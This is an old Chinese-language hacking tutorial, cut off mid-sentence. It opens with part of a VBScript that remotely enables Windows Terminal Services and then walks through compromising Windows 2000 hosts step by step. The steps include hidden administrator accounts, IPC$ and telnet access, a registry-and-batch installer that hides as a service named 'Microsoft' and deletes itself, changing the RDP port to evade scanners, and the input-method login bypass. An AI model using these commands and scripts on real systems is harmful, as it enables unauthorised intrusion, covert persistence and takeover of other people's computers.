strwqlquery="select * from win32_operatingsystem where primary='true'"
set colinstances=objswbemservices.execquery(strwqlquery)
for each objinstance in colinstances
objinstance.win32shutdown(flag)
next
showerror(err.number)
else
wscript.echo "You need to reboot target."&vbcrlf&"Then,"
end if
wscript.echo "You can logon terminal services on "&port&" later. Good luck!"
function showerror(errornumber)
if errornumber Then
wscript.echo "Error 0x"&cstr(hex(err.number))&" ."
if err.description <> "" then
wscript.echo "Error description: "&err.description&"."
end if
wscript.quit
else
wscript.echo "OK!"
end if
end function
function usage()
wscript.echo string(79,"*"
wscript.echo "ROTS v1.05"
wscript.echo "Remote Open Terminal services Script, by 草哲"
wscript.echo "Welcome to visite
www.5458.net"
wscript.echo "Usage:"
wscript.echo "cscript "&wscript.scriptfullname&" targetIP username password [port] [/r|/fr]"
wscript.echo "port: default number is 3389."
wscript.echo "/r: auto reboot target."
wscript.echo "/fr: auto force reboot target."
wscript.echo string(79,"*"&vbcrlf
end function
ok,可以保存了,后打开cmd 文件改名ren gangqin.txt gangqin.vbe
cscript gangqin.vbe 127.0.0.1 administrator “” 3389 /fr
说明
cscript gangqin.vbe是命令 后面的是ip,用户名,密码,如果有密码,不用加“”
后面是端口,可以改,不过,本人不推荐改端口./fr是自动重启,也可以/r这个是不让他自动重启。
如果显示ok,就好了,我们ping 127.0.0.1 -t
哈哈,等它重启吧!!!!!!
大概二分钟就可以了吧,我们用xp的3389登录器进入
好了,我们现在要加用户了,
还是运行里打cmd
net user 用户名$ 密码 /add
(注:这个是加用户,后面如果加了$,在用户管理器里将不显示这个用户名,你的用户名的全名就是"用户名$")
net localgroup administrators 用户名$ /add (这个是给你的用户加权限)
现在就改3389的端口:
到这里,你已经拥有3389肉鸡了!但是会不会被别的入侵者发现呢?下面所教的就是怎么让3389只为你服务!
我们现在使用的3389登陆器有两种版本,一种是2000/98,一种是XP。二者区别呢?前者使用的默认端口3389对
目标,后者默认的也是3389端口,但是它还支持别的端口进行连接!所以呢......我们来修改3389的连接端口
来躲过普通扫描器的扫描!修改方法如下:
修改服务器端的端口设置 ,注册表有2个地方需要修改。
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp]
PortNumber值,默认是3389,修改成所希望的端口,比如1314
第二个地方:
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]
PortNumber值,默认是3389,修改成所希望的端口,比如1314
现在这样就可以了。重启系统吧。
注意:事实上,只修改第二处也是可以的。另外,第二处的标准联结应该是
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\<connection>
<connection>表示具体的某个RDP-TCP连结。
重启过后,看看端口有没有改。
小技巧:修改注册表键值时,先选择10进制,输入你希望的端口数值,再选择16进制,系统会自动转换。
这只是改了端口,他的administrator是空密码,怎么办呢
哈哈 ,还是我的老办法,给他在他的桌面上写一个文本,内容是,你的计算机被入侵了,请更改密码,打上补丁
呵呵,完了,如果你看玩了这些,还不会,那我真的没办法,因为写的已经太详细了!!!!!
1:3389的服务名是:Terminal Server
2:我的3389为什么不能进?因为3389只能同时让2个客户端进行连接
所以,可以是1进的人多了,2没有admin权
3:我进3389的时候,本机上的人能在桌面看见我吗?
不能,不过可以在进程里看出来,还有一些别的方法发现......
4:我扫描的时候发现了3389开放,但没有弱口令,能进吗?
如果没有打sp2的补丁就能,不过,现在很少有这样的机了
如果开了3389,没有弱口令,可以暴力破解,不过会很慢哦,呵呵............
5:为什么我的电脑是2000不能开3389?
因为你的电脑不是server版,pro是不能开3389的,
9:开3389最简单得方法
首先我们制作开启3389的工具
先把下面的注册表内容copy一份,另存为3389.reg注册表文件
注册表内容:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache]
"Enabled"="0"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"ShutdownWithoutLogon"="0"
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]
"EnableAdminTSRemote"=dword:00000001
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
"TSEnabled"=dword:00000001
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD]
"Start"=dword:00000002
[HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle]
"Hotkey"="1"
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SecuService]
"Start"=dword:00000002
"ErrorControl"=dword:00000001
"ImagePath"=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,\
74,00,25,00,5c,00,53,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,65,\
00,76,00,65,00,6e,00,74,00,6c,00,6f,00,67,00,2e,00,65,00,78,00,65,00,00,00
"ObjectName"="LocalSystem"
"Type"=dword:00000010
"Description"="Microsoft"
"DisplayName"="Microsoft"
再把下面的内容保存为批处理文件3389.bat
安装批处理内容:
copy termsrv.exe eventlog.exe
regedit.exe /s 3389.reg
del 3389.reg
del 3389.exe
del 3389.bat
用winrar制作成exe自解压缩包
61.188.***.*** user:administrato pass:空
先使用工具letmein判断其操作系统
letmein \\ip -all -d
TsInternetUser (TsInternetUser)这个是2000的终端用户,现在可以判断其为2000server了
再使用终端登陆软件看看他的3389是不是已经开启了免了费事折腾
应该没有开启了
建立ipc连接
copy工具过去
net use \\ip\ipc$ "pass" /user:name
copy file \\ip\admin$\system32
用opentelnet开对方的telnet
opentelnet \\ip name pass 1 99
用telnet进入
进入到对方的winnt\system32\
目录
解压缩3389.exe
运行安装批处理3389.bat
现在我们把对方重起一下,用reboot
我们用ping命令监视他的上线情况,等他下线,呵呵下了,又上来了,不慌连,3389等会才能好,对方的机器有点慢
看见了么,开启成功!
现在开始.
假设我们拿到了一个主机的管理员帐户和密码.
主机: 192.168.0.1
帐号: administrator
密码: 7788
2000系统安装在c:\winnt下
从上面的的介绍可以知道,2000专业版是不可以远程安装终端服务的,那我们就要首先来
判断此主机是专业版还是服务器版,才能进入下一个环节.
我们可以先用对方所开帐户判断:
c:\>letmein \\192.168.0.1 -all -d
stating connecting to server ...
Server local time is: 2002-1-13 10:19:22
Start get all users form server...
--------------------------
Total = 5
--------------------------
num0= Administrator ()
num1= Guest ()
num2= IUSR_servername (Internet 来宾帐号 )
num3= IWAM_servername (启动 IIS 进程帐号)
num4= TsInternetUser (TsInternetUser)
--------------------------
Total = 5
--------------------------
一般情况num2/3/4这三个帐户都是2000server默认开启的.
2000专业版默认是不开这些帐户的.
我们也可以扫描对方开放的端口进一步确认:
用扫描软件如:superscan3.exe扫描对方所开端口
判断对方是否开启25,3372等2000server默认开启的端口.
当然我们还可以使用一些工具,如:cmdinfo.zip
这2个东东可以获得本地或远程NT/2K主机的版本,系统路径,源盘路径,PACK版本,安装时间等一
系列信息,一个图形界面,一个命令行.
通过返回的信息就可以很清楚的了解对方主机情况.
还有一些其他的方法来判断,如:从对方所开的服务来确定等,
从上面的判断准确率还算高,别的就不一一说明了.
如果你在以上步骤里发现对方主机并没有那3个帐户,默认端口也没开,
或cmdinfo返回的信息对方是2000专业版,你就要放弃安装3389的计划了.
现在我们要进入下一环节:
判断终端服务到底有没有安装?
你也许要问:为什么还要判断啊?我扫描没有发现3389端口啊?
这里就需要解释一下,如果装了终端服务组件,可能有哪几种情况扫描不到3389端口?
1.终端服务termservice在"管理工具">>>"服务"中被禁用.
2.终端服务连接所需的RDP协议在"管理工具">>>"终端服务配置"中被停用连接.
3.终端服务默认连接端口3389被人为的改变.如何改变请看修改终端服务默认的3389端口(图文)
4.终端服务绑定的网络适配器不是外网的.
5.防火墙和端口过滤之类的问题.
6.....(还有我没想到的)
其实,我们遇到最多的情况就是以上5种情况.
现在开始判组件是否被安装.
先与远程主机连接,映射远程主机C盘为本地Z盘
net use z: \\192.168.0.1\c$ "7788" /user:"administrator"
命令成功完成。
然后转到Z盘,检查
Z:\Documents and Settings\All Users\「开始」菜单\程序\管理工具>
里是否有 "终端服务管理器"和"终端服务配置"的快捷方式文件
如有已安装服务组件的会有,反之,没有(98% 人为故意删的可能性较小)
我们还可以在下一步telnet到对方主机后使用终端服务自带的命令进一步的核实.
判断完毕,对方好像是没有安装终端服务组件,可以进入下一步:
telnet登陆对方主机,准备安装服务组件.
在这里,我强烈建议使用2000自带的telnet服务端登陆,
有回显,不容易出错.个人感觉使用它,一次成功的比例高很多.(呵呵~,个人理解啊!)
就算没有开,打开用完后再关掉就完了.
.abu.写的最快速登录WIN2K TELNET 服务已经把这个方法介绍的非常详细,
而且他的办法(在本机建立同名,同密码帐户),让快速实现telnet登陆成为现实.
假如我们已开启对方23端口,
telnet 192.168.0.1
输入用户名/密码
*===============================================================
欢迎使用 Microsoft Telnet 服务器。
*===============================================================
C:\>
\\成功进入!!!!
进入后,再次检查终端组件是否安装:
c:\>query user
这个工具需要安装终端服务.
这样就进一步确定了组件没有被安装.如果返回:
USERNAME SESSIONNAME ID STATE IDLE TIME LOGON TIME
>w1 console 0 运行中 . 2002-1-12 22:5
\\类似这样的信息,可能组件就已安装.
好!都清楚了,可以开始安装了.
---------------------------------------------------
C:\>dir c:\sysoc.inf /s //检查INF文件的位置
c:\WINNT\inf 的目录
2000-01-10 20:00 3,770 sysoc.inf
1 个文件 3,770 字节
-----------------------------------------------------
C:\> dir c:\sysocmgr.* /s //检查组件安装程序
c:\WINNT\system32 的目录
2000-01-10 20:00 42,768 sysocmgr.exe
1 个文件 42,768 字节
-----------------------------------------------------
c:\>echo [Components] > c:\wawa
c:\>echo TSEnable = on >> c:\wawa
//这是建立无人参与的安装参数
c:\>type c:\wawa
[Components]
TSEnable = on
//检查参数文件
------------------------------------------------------
c:\>sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\wawa /q
-----------------------------------------------------
这一条就是真正安装组件的命令.
以上这条命令没有加/R参数,主机在安装完后自动重起.
如若加了/R参数主机就不会重起.
如果一切正常的话,几分钟后对方主机将会离线,当它重新回来时,
3389终端服务就已经开启.你就可以连上去了.
问题和建议:
A 在安装过程中,不使用/R,有时主机也不会重起,你就要手动重起他,但在使用诸如:iisreset /reboot命令时,对方
的屏幕会出现个对话框,写着谁引起的这次启动,离重起还有多少秒.
B 一次不行可以再试一次,在实际中很有作用.
C 在输入sysocmgr命令开始安装时,一定不要把命令参数输错,那会在对方出现一个大的对话框,是sysocmgr的帮助,很是显眼,
而且要求确定.在你的屏幕上是不会有任何反应的,你不会知道出错,所以会有B的建议.
10:win2k的3389端口攻击
WIN2000中文简体版存在的输入法漏洞,可以使本地用户绕过身分验证机制进入系统内部。经实验,WIN2000中文简体版的终端服务,在远程操作时仍然存在这一漏洞,而且危害更大。
WIN2000的终端服务功能,能使系统管理员对WIN2000进行远程操作,采用的是图形界面,能使用户在远程控制计算机时功能与在本地使用一样,其默认端口为3389,用户只要装了WIN2000的客户端连接管理器就能与开启了该服务的计算机相联。因此这一漏洞使终端服务成为WIN2000的合法木马。
工具:客户端连接管理器,下载地址:自己找吧,天天有好几种呢。
入侵步骤:
一,获得管理员账号。
我们先对一个网段进行扫描,扫描端口设为3389,运行客户端连接管理器,将扫描到的任一地址加入到,设置好客户端连接管理器,然后与服务器连结。几秒钟后,屏幕上显示出WIN2000登录界面(如果发现是英文或繁体中文版,放弃,另换一个地址),用CTRL+SHIFT快速切换输入法,切换至全拼,这时在登录界面左下角将出现输入法状态条(如果没有出现,请耐心等待,因为对方的数据流传输还有一个过程)。用右键点击状态条上的微软徽标,弹出“帮助”(如果发现“帮助”呈灰色,放弃,因为对方很可能发现并已经补上了这个漏洞),打开“帮助”一栏中“操作指南”,在最上面的任务栏点击右键,会弹出一个菜单,打开“跳至URL”。此时将出现WIN2000的系统安装路径和要求我们填入的路径的空白栏。比如,该系统安装在C盘上,就在空白栏中填入"c:\winnt\system32"。然后按“确定”,于是我们就成功地绕过了身份验证,进入了系统的SYSTEM32目录。
现在我们要获得一个账号,成为系统的合法用户。在该目录下找到"net.exe",为"net.exe"创建一个快捷方式,右键点击该快捷方式,在“属性”->“目标”->c:\winnt\system32\net.exe后面空一格,填入"user guest /active :yes"点“确定”。这一步骤目的在于用net.exe激活被禁止使用的guest账户,当然也可以利用"user 用户名 密码/add",创建一个新账号,但容易引起网管怀疑。运行该快捷方式,此时你不会看到运行状态,但guest用户已被激活。然后又修改该快捷方式,填入"user guest 密码",运行,于是guest便有了密码。最后,再次修改,填入“localgroup administrators guest /add,将guest变成系统管理员。
注意事项:1、在这过程中,如果对方管理员正在使用终端服务管理器,他将看到你所打开的进程id,你的ip和机器名,甚至能够给你发送消息。
2、终端服务器在验证你的身份的时候只留给了你一分钟的时间,在这一分钟内如果你不能完成上述操作,你只能再连结。
3、你所看到的图像与操作会有所延迟,这受网速的影响。
二,创建跳板。
再次登录终端用务器,以"guest"身份进入,此时guest已是系统管理员,已具备一切可执行权。打开“控制面板”,进入“网络和拔号连接”,在“本地连接”或“拔号连接”中查看属性,看对方是否选择“M
